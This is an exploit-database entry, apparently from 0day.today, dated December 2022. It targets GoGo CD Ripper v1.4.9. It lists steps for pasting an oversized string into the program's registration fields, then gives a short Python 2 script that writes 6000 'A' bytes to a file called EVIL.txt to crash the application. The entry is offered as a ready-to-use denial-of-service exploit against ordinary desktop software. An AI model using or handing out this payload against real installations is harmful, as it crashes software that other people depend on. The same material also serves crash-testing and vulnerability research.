id: 38133
date: 12/31/2022
title: GoGo CD Ripper V1.4.9 Denial of Service Exploit
author: Achilles
cves: 

# Exploit Title: GoGo CD Ripper V1.4.9 Denial of Service Exploit
# Date: 30.12.2022
# Vendor Homepage:https://cd-mp3.org/
# Software Link:  https://download.cnet.com/Gogo-CD-To-MP3-Ripper/3001-2140_4-10330843.ht
# Exploit Author: Achilles
# Tested Version: v1.4.9
# Tested on: Windows 7 x64
#            


# 1.- Run python code :GoGo.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open GoGo CD Ripper and Click 'Register'
# 4.- Paste the content of EVIL.txt into the Field: 'Reg-Name and Reg-Code'
# 5.- Click 'OK' and you will see a crash.



#!/usr/bin/env python
buffer = "\x41" * 6000

try:
	f=open("Evil.txt","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"

#  0day.today [2023-03-27]  #